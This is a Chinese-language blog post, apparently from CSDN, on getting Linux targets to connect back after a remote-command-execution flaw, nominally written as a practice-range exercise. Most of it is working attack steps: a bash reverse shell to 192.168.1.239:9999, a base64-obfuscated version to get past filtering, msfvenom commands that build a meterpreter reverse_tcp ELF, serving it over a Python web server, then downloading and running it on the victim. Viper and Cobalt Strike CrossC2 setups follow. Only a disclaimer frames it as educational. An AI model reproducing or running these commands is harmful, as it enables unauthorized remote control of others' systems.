相关声明
本文内容仅为技术科普,请勿用于非法用途。概不负责,一切后果由用户自行承担,如果内容有误请大佬及时指正。
写spring系列到时候就突然想写一下咋上线(因为我之前也只会bash反弹哈哈哈)打靶场顺便试一下
如果命令执行有回显
直接touch 111.txt
find / -name 111.txt 2>/dev/null 查找绝对路径
有绝对路径了你要么自己vim 个木马,要么服务器写个马,wget到服务器上,蚁剑一连就行
然后就是无回显的
反弹shell
bash -i >& /dev/tcp/192.168.1.239/9999 0>&1
然后有时候你通过漏洞进行rce有时候会把bash啥的拦截掉,
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjM5Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}
然后你发现这个也不管用,那就用其他方法上线
[~]#棱角 ::Edge.Forum*更多命令在这
Msf
(参考:上线MSF(Metasploit)的几种常见方式_msf上线linux_西湖第一剑的博客-CSDN博客)
主要用handler模块,也就是用木马上线
配置一下攻击机的模块,payload,地址等
生成木马lalal.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ip LPORT=8888 -f elf>lalal.elf(其他几种payload操作系统见参考链接,给的很全)
查看一下生成成功(为啥这块ip不能填0.0.0.0,因为你要把你反弹的地址写道这个木马里,你在肉鸡里执行你的木马的时候0.0.0.0就指向了肉鸡而不是你的攻击机)
攻击机搭建简易web服务器 python -m SimpleHTTPServer 80
然后命令执行把lalal.elf下载到肉鸡
赋权,执行
./lalal.elf执行之后尬住了,发现没有成功反弹shell,参考文章:msf生成linux elf木马反弹不成功的解决方法_msf生成elf_kuxing_admin的博客-CSDN博客,虽然这样也能解决问题,但是感觉文章说的也不对啊,版本是向下兼容的啊,最后仔细检查,发现生成木马的命令 LPORT 写成了LPOR,焯!
emmmm,上线
Viper(这个和meatspliot很像)
他和metaspliot的上线功能有点像,但是它可以部署一个客户端,你可以任意地点登录而不是只能在vps就行shell连接
Viper部署 https://blog.csdn.net/qq_41901122/article/details/127776658
第一步通过命令执行 uname -a 查看多少位操作系统
新增监听-linux-x64-meterpreter/reverse_tcp lhost你的vps,lport 自己选,其他不改直接新增监听。
点击下方生成elf 也可以生成载荷-elf文件,然后就会通过浏览器下载。
把下载的elf马子通过MobaXterm传到vps上
python -m SimpleHTTPServer port 起一个服务,然后命令执行把马子下到靶机,chmod 777 赋权,执行马子,刷新viper web页面就上线了。
ok了,可以命令执行,查看文件等
Cs上线linux
部署:
关于CS的第一次安装及使用(linux搭建服务端)_linux安装cs_Lying1956的博客-CSDN博客
cs一般用于上线windows,但是用插件也可以上线linux,先按照教程部署好
然后下载linux上线的插件,下载红框的两个(我是windows作为客户端所以下的是win.zip,其他同理)
下载插件:https://github.com/gloxec/CrossC2/releases/tag/v3.1.0
新建一个CrocssC2在根目录下目录下放这几个文件(之前下载的+一个服务端的key,这个key实在服务端运行./teamserver之后生成的)
修改can文件内容
脚本管理器-加载-选择修改好的can文件
然后新建https监听器 一定要选beacon https(默认的是http)
然后再选择插件CrossC2
点击生成就会生成马子,位置再cs的根目录下
然后把这俩马子同样的传到靶机,赋权,运行,然后就上线了
1192
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
